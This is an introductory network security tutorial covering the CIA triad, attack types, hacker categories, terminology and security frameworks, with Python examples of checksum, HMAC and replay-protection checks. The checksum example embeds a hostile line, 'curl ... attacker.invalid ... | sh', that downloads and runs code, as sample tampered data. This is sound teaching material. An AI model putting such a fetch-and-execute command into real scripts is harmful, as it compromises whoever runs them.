Network Security Fundamentals Part 1: Basic Concepts and Understanding Threats
Network Security from Fundamentals to Practice, Part 1: Basic Security Concepts and Understanding Threats
Introduction: Why Should You Learn Network Security?
In the digital age, we send and receive vast amounts of data through networks every day. Online banking, email, social media, cloud services—most aspects of our daily lives depend on networks. In this environment, network security is no longer optional but essential.
This series is designed to help you learn network security step by step, from basic concepts to practical applications. In this first part, we'll cover the fundamental concepts of security and understanding threats.
1. The Three Pillars of Information Security (CIA Triad)
The core of information security consists of three elements known as the CIA Triad. These three elements form the foundation of all security policies and system design.
1.1 Confidentiality
Confidentiality ensures that only authorized users can access information. It prevents sensitive data from being exposed without authorization.
- Implementation methods: Encryption, access control, authentication systems
- Examples: HTTPS communication, database encryption, Multi-Factor Authentication (MFA)
- Threat examples: Eavesdropping, data leaks, sniffing attacks
1.2 Integrity
Integrity ensures that data has not been modified in unauthorized ways. The goal is to maintain the accuracy and reliability of data.
- Implementation methods: Hash functions, digital signatures, version control
- Examples: File checksum verification, blockchain technology, audit logs
- Threat examples: Data tampering, Man-in-the-Middle (MITM) attacks, SQL injection
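The "file checksum verification" listed above is worth seeing in working code, together with the caveat a practitioner needs: a plain hash only detects tampering when the attacker could not also replace the published hash. The following Python is an added example, not code from the original article. The script bytes, the publisher key and the attacker key are constructed for illustration; HMAC stands in here for the keyed case, and for software distributed to the public a digital signature (public-key) is the right tool, because a shared HMAC key would have to be handed to every verifier.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Plain SHA-256 digest in hex, the same value `sha256sum` prints."""
    return hashlib.sha256(data).hexdigest()


def verify_checksum(data: bytes, published_hex: str) -> bool:
    """Checksum verification: recompute the digest and compare it in constant time."""
    return hmac.compare_digest(sha256_hex(data), published_hex.lower())


def hmac_tag(key: bytes, data: bytes) -> str:
    """Keyed digest (HMAC-SHA256): only a holder of `key` can produce a valid tag."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_hmac(key: bytes, data: bytes, tag_hex: str) -> bool:
    return hmac.compare_digest(hmac_tag(key, data), tag_hex)


# Constructed sample data (not from any real software): an install script
# and a version an attacker has modified in transit.
ORIGINAL = b"#!/bin/sh\necho 'installing app 1.0'\n"
TAMPERED = ORIGINAL + b"curl -s http://attacker.invalid/x | sh\n"
SIGNING_KEY = b"hypothetical-publisher-secret"      # assumed to live only on the publisher's side
ATTACKER_KEY = b"attacker-does-not-have-the-real-key"


def demo() -> dict:
    """Walk through the cases and return the outcomes so they can be checked."""
    published_sha = sha256_hex(ORIGINAL)
    published_tag = hmac_tag(SIGNING_KEY, ORIGINAL)
    return {
        # Case 1: an unmodified download matches the published checksum.
        "original_checksum_ok": verify_checksum(ORIGINAL, published_sha),
        # Case 2: in-transit tampering is caught when the checksum arrived over a trusted channel.
        "tampered_checksum_ok": verify_checksum(TAMPERED, published_sha),
        # Case 3 (the caveat): if the attacker can also replace the checksum page,
        # a plain hash proves nothing; the tampered file "verifies" against the
        # attacker's recomputed hash.
        "tampered_with_attacker_checksum_ok": verify_checksum(TAMPERED, sha256_hex(TAMPERED)),
        # Case 4: a keyed tag cannot be recomputed without the key, so the attacker's
        # substitute tag fails even though file and tag are consistent with each other.
        "tampered_with_attacker_tag_ok": verify_hmac(
            SIGNING_KEY, TAMPERED, hmac_tag(ATTACKER_KEY, TAMPERED)
        ),
        "original_tag_ok": verify_hmac(SIGNING_KEY, ORIGINAL, published_tag),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case}: {ok}")
```

Case 3 is the one people miss: a SHA-256 file posted on the same web server as the download protects against a corrupted transfer, not against an attacker who controls that server. `hmac.compare_digest` is used for every comparison so that a byte-by-byte `==` does not leak how many leading characters of the digest matched.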
1.3 Availability
Availability ensures that authorized users can access information and systems whenever needed.
- Implementation methods: Redundancy, backup, disaster recovery plans
- Examples: Load balancing, RAID configuration, CDN utilization
- Threat examples: DDoS attacks, ransomware, hardware failures
2. What is Network Security?
Network security is the totality of policies, procedures, and technologies designed to protect computer networks and their data from unauthorized access, misuse, modification, and destruction.
2.1 Scope of Network Security
- Physical security: Server room access control, equipment protection
- Technical security: Firewalls, IDS/IPS, encryption
- Administrative security: Policy establishment, training, auditing
2.2 Defense in Depth
Effective network security applies multiple layers of security measures rather than a single line of defense. This is called the "Defense in Depth" strategy.
Perimeter Security
|
Network Security
|
Host Security
|
Application Security
|
Data Security
3. Types of Security Threats
Security threats can be broadly classified into passive attacks and active attacks.
3.1 Passive Attacks
Passive attacks gather information without altering system resources. Because they leave few traces and are hard to detect, the emphasis is on prevention, above all encrypting traffic so that whatever is captured is useless to the attacker.
- Eavesdropping: Secretly intercepting network traffic to collect information
- Traffic Analysis: Analyzing communication patterns to extract useful information
- Scanning: Probing networks and systems for open ports, services, and vulnerabilities. Strictly speaking, scanning sends packets to the target and can therefore be logged or flagged by an IDS; it is grouped with passive attacks here because it only gathers information and changes nothing on the target
3.2 Active Attacks
Active attacks directly modify or damage systems or data.
- Masquerade: Impersonating authorized users or systems
- Replay: Capturing and retransmitting legitimate data transmissions
- Modification: Altering data in transit
- Denial of Service: Exhausting system resources to disrupt normal services
| Category | Passive Attacks | Active Attacks |
|---|---|---|
| Purpose | Information gathering | System damage/modification |
| Detection difficulty | Difficult | Relatively easy |
| Response strategy | Prevention-focused | Detection and response |
| Examples | Sniffing, port scanning | DDoS, malware |
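The masquerade, replay and modification attacks of section 3.2 are easiest to understand as the checks a receiver has to perform. The following Python is an added example, not code from the original article: the sender attaches a nonce, a timestamp and a MAC to every message; the receiver rejects modified messages (bad MAC), messages from a sender who lacks the key (masquerade), old captures (stale timestamp) and duplicates inside the acceptance window (replay). The shared key, the message bodies and the fake clock are constructed for the demonstration.

```python
import hashlib
import hmac
import json
import secrets
import time


def canonical(msg: dict) -> bytes:
    """Deterministic encoding so sender and receiver MAC identical bytes."""
    return json.dumps(msg, sort_keys=True, separators=(",", ":")).encode()


def build_message(key: bytes, body: str, ts: float) -> bytes:
    """Sender side: attach a fresh nonce and a timestamp, then MAC the whole message."""
    msg = {"body": body, "ts": ts, "nonce": secrets.token_hex(16)}
    tag = hmac.new(key, canonical(msg), hashlib.sha256).hexdigest()
    return json.dumps({"msg": msg, "tag": tag}).encode()


class Receiver:
    """Receiver side: rejects forged, modified, stale and replayed messages."""

    def __init__(self, key: bytes, clock=time.time, window: float = 30.0):
        self.key = key
        self.clock = clock        # injectable so the demo can move time by hand
        self.window = window      # seconds of delay / clock skew tolerated
        self.seen = {}            # nonce -> timestamp, pruned as the window slides

    def _prune(self, now: float) -> None:
        # A nonce older than the window is rejected by the timestamp check anyway,
        # so it no longer needs to be remembered; this keeps memory bounded.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}

    def check(self, wire: bytes) -> str:
        try:
            envelope = json.loads(wire)
            msg, tag = envelope["msg"], envelope["tag"]
            if not (isinstance(msg, dict) and isinstance(msg.get("ts"), (int, float))
                    and isinstance(msg.get("nonce"), str) and isinstance(tag, str)):
                return "reject: malformed"
            expected = hmac.new(self.key, canonical(msg), hashlib.sha256).hexdigest()
        except (ValueError, KeyError, TypeError):
            return "reject: malformed"
        # 1. Authenticity and integrity: catches modification and masquerade.
        if not hmac.compare_digest(expected, tag):
            return "reject: bad MAC"
        now = self.clock()
        self._prune(now)
        # 2. Freshness: a capture cannot be replayed after the window has passed.
        if abs(now - msg["ts"]) > self.window:
            return "reject: stale"
        # 3. Uniqueness: the same valid message seen twice inside the window is a replay.
        if msg["nonce"] in self.seen:
            return "reject: replay"
        self.seen[msg["nonce"]] = msg["ts"]
        return "accept"


def demo() -> dict:
    key = b"hypothetical-shared-session-key"   # constructed; assumed known to sender and receiver only
    now = [1_700_000_000.0]                    # fake clock, advanced by hand below
    rx = Receiver(key, clock=lambda: now[0])
    legit = build_message(key, "amount=100 acct=42", now[0])
    # An attacker on the path captures `legit` and tries a few things with it.
    modified = legit.replace(b"amount=100", b"amount=900")   # change the amount, keep the tag
    results = {
        "first_delivery": rx.check(legit),
        "immediate_replay": rx.check(legit),
        "modified_body": rx.check(modified),
    }
    now[0] += 3600                              # an hour later: try the capture again
    results["late_replay"] = rx.check(legit)
    # Without the key the attacker cannot mint a fresh valid message either (masquerade).
    results["forged"] = rx.check(build_message(b"wrong-key", "amount=100 acct=42", now[0]))
    # A genuinely new message from the real sender still gets through.
    results["fresh_message"] = rx.check(build_message(key, "amount=5 acct=7", now[0]))
    return results


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case}: {verdict}")
```

The point of the example is that a valid MAC alone does not stop a replay: the captured message in `immediate_replay` carries a perfectly good tag and is rejected only because its nonce has already been seen. The timestamp bounds how long nonces must be remembered; without it the `seen` set would grow forever.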
4. Types and Motivations of Hackers
Hackers are classified into several types based on their motivations and the legality of their actions.
4.1 White Hat Hackers
Also known as ethical hackers, they find and report security vulnerabilities with organizational permission.
- Role: Penetration testing, security audits, vulnerability assessments
- Motivation: Security enhancement, professional activity, legitimate compensation
4.2 Black Hat Hackers
Hackers who intrude systems for malicious purposes.
- Role: Data theft, system destruction, financial gain pursuit
- Motivation: Financial gain, notoriety, personal grudges
4.3 Gray Hat Hackers
Hackers who operate in the gray area between white hat and black hat.
- Characteristics: Discover vulnerabilities without permission but request compensation or publicly disclose them
- Motivation: Technical curiosity, reputation, compensation expectation
4.4 Other Types
- Script Kiddies: Novice hackers who use existing tools without technical knowledge
- Hacktivists: Activists who hack for political/social purposes
- State-Sponsored Hackers: Those who conduct cyber operations with government support
- Insider Threats: Malicious or negligent employees within an organization
5. Attack Vectors and Attack Surface
5.1 Attack Vector
An attack vector is the path or method an attacker uses to penetrate a system.
- Email: Phishing, malicious attachments, spear phishing
- Web: Malicious websites, drive-by downloads, XSS
- Network: Port vulnerabilities, protocol exploitation, wireless network attacks
- Social Engineering: Information theft through social engineering techniques
- Physical Access: USB drops, hardware manipulation, theft
- Supply Chain: Software update tampering, third-party library vulnerabilities
5.2 Attack Surface
The attack surface is the sum of all potential entry points where an attacker could penetrate.
- Digital attack surface: Open ports, web applications, APIs, cloud services
- Physical attack surface: Offices, server rooms, removable storage devices
- Social/human attack surface: Employees, partners, customers
Security Tip: Minimizing the attack surface is a fundamental principle of security. Disable unnecessary services and apply the principle of least privilege.
6. Security Terminology
Here are essential terms you need to know for learning network security.
6.1 Vulnerability
A security weakness in a system or application that an attacker can exploit.
- Types: Software bugs, configuration errors, design flaws
- Management: Regular vulnerability scanning, patch management, security assessments
6.2 Exploit
Code or a technique that actually takes advantage of a vulnerability to make the target do something it should not.
- Types: Local exploits, remote exploits, client-side exploits
- Distribution: Exploit kits, public PoC (Proof of Concept)
6.3 Payload
Malicious code or commands executed after a successful exploit.
- Types: Reverse shell, backdoor, ransomware, keylogger
- Purpose: Establishing persistent access, data theft, system control
6.4 Zero-day
A vulnerability unknown to the software vendor or the public, or an attack exploiting such a vulnerability.
- Risk: Extremely difficult to defend against as no patch exists
- Response: Behavior-based detection, network segmentation, principle of least privilege
- Market: Zero-day vulnerabilities can be traded at high prices
6.5 Additional Terms
| Term | Description |
|---|---|
| CVE | Common Vulnerabilities and Exposures - Standard identifier for disclosed vulnerabilities |
| CVSS | Common Vulnerability Scoring System - Vulnerability severity score from 0.0 to 10.0, derived from a vector of base metrics (attack vector, complexity, privileges, user interaction, scope, C/I/A impact) |
| APT | Advanced Persistent Threat - A long-running, targeted intrusion by a well-resourced attacker (often state-backed) that aims to stay hidden rather than cause immediate damage |
| IoC | Indicators of Compromise - Observable artifacts such as file hashes, IP addresses, domain names, or registry keys that point to an intrusion |
| TTPs | Tactics, Techniques, and Procedures - Attacker's operational methods |
7. Introduction to Security Frameworks
Internationally recognized frameworks and standards exist for systematic security management.
7.1 NIST Cybersecurity Framework
A cybersecurity framework developed by the National Institute of Standards and Technology (NIST).
Five Core Functions (as defined in CSF 1.1; CSF 2.0, published in 2024, adds a sixth function, Govern, covering strategy, policy, and risk oversight):
- Identify: Understand assets, risks, and governance
- Protect: Implement appropriate safeguards
- Detect: Identify security events
- Respond: Take action on detected incidents
- Recover: Restore to normal operations
NIST CSF Structure:
+--------+ +--------+ +--------+ +--------+ +--------+
|Identify|-->|Protect |-->| Detect |-->|Respond |-->|Recover |
+--------+ +--------+ +--------+ +--------+ +--------+
The arrows show the order in which the functions are usually explained. In practice they run continuously and in parallel, and the lessons from Detect, Respond, and Recover feed back into Identify and Protect.
7.2 ISO/IEC 27001
The international standard for Information Security Management Systems (ISMS).
- Purpose: Systematically protect organizational information assets
- Structure: Annex A of the 2013 edition defines 14 domains with 114 controls; the 2022 revision regroups them into 4 themes (organizational, people, physical, technological) with 93 controls
- Certification: Certification available through third-party certification bodies
Key Domains (2013 edition, Annex A):
- Information security policies
- Organization of information security
- Human resource security
- Asset management
- Access control
- Cryptography
- Physical and environmental security
- Operations security
- Communications security
- System acquisition, development and maintenance
- Supplier relationships
- Information security incident management
- Information security aspects of business continuity
- Compliance
7.3 Other Frameworks
- CIS Controls: Prioritized list of security controls (20 in version 7, consolidated to 18 in version 8)
- COBIT: IT governance and management framework
- MITRE ATT&CK: Knowledge base of attacker tactics and techniques
- PCI DSS: Payment Card Industry Data Security Standard
Conclusion and Next Episode Preview
In this episode, we covered the core concepts that form the foundation of network security. We discussed the CIA Triad, types of security threats, hacker classifications, key security terms, and frameworks for systematic security management.
Understanding these fundamental concepts firmly is the first step toward practical security. Rather than just learning how to use tools, understanding why security is necessary and what threats exist enables effective defense.
In the next episode, we'll review the OSI 7-layer model and examine the security threats that can occur at each layer and how to respond to them. We'll also cover actual attack techniques such as ARP spoofing, IP spoofing, and TCP SYN Flood, as well as packet analysis basics using Wireshark.
Security is a process, not a product. Continue to develop your security capabilities through ongoing learning and practice.